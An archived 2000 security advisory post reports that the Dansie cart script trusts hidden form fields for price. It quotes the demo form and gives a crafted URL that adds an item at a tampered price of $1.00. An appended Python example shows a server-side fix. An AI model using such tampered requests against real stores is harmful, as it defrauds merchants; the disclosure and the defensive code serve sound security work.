more problems with that POS dansie cart software!

2000-04-14T00:00:00
ID SECURITYVULNS:DOC:67
Type securityvulns
Reporter Securityvulns
Modified 2000-04-14T00:00:00

Description

if installing a backdoor in the cart software wasn't bad enough.. the whole implementation of pricing and adding items to cart is crap..

example form to add items to your cart (kindly provided on the publisher's site using the demo cart they set up for us):

snip

<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">

Black Leather purse with leather straps<BR> Price: $20.00<BR>

<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
<INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
<INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling -->
<INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
<INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
<INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">

<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>

snip

a couple of quick alterations and we can now add:

one piece of crap cart software..

http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables

I am aware this was posted a few months ago but I don't recall anyone posting in relation to this particular software package..

tom
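The defect described above is that cart.pl takes price and shipping from hidden form fields the browser controls. The following is an added example (not Dansie's code and not from the original post) of how an add-to-cart handler for the same field names can be written so money values always come from a server-side catalogue, with client-supplied values that disagree recorded for operators; the CATALOGUE dictionary, the CartError class and the function names are assumptions made up for the example.

```python
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Constructed server-side catalogue keyed by the item name the form sends.
# Prices live here, not in the browser's hidden fields.
CATALOGUE = {
    "Black leather purse": {
        "price": Decimal("20.00"), "sh": Decimal("1.00"), "img": "purse.jpg",
    },
}


class CartError(ValueError):
    """Raised when a submission names an item the catalogue does not know."""


def add_to_cart(query_string, cart=None, audit=None):
    """Process an add-to-cart submission with cart.pl's field names
    (name, price, sh, img, ...) but take every money value from CATALOGUE.

    Client-supplied price/sh that differ from the catalogue (or are not
    valid numbers) are appended to `audit` as tampering indicators and
    otherwise ignored. Returns the updated cart as a list of line items."""
    cart = [] if cart is None else cart
    audit = [] if audit is None else audit
    fields = parse_qs(query_string, keep_blank_values=True)
    name = fields.get("name", [""])[0]
    item = CATALOGUE.get(name)
    if item is None:
        # An unknown name is rejected rather than priced from the request.
        raise CartError(f"unknown item: {name!r}")
    for key in ("price", "sh"):
        sent = fields.get(key, [None])[0]
        if sent is None:
            continue
        try:
            mismatch = Decimal(sent) != item[key]
        except InvalidOperation:
            mismatch = True
        if mismatch:
            audit.append(f"{key} mismatch for {name!r}: client sent {sent!r}, "
                         f"catalogue has {item[key]}")
    cart.append({"name": name, "price": item["price"],
                 "sh": item["sh"], "img": item["img"]})
    return cart


def cart_total(cart):
    """Sum of price plus shipping over all line items, from catalogue values only."""
    return sum(line["price"] + line["sh"] for line in cart)
```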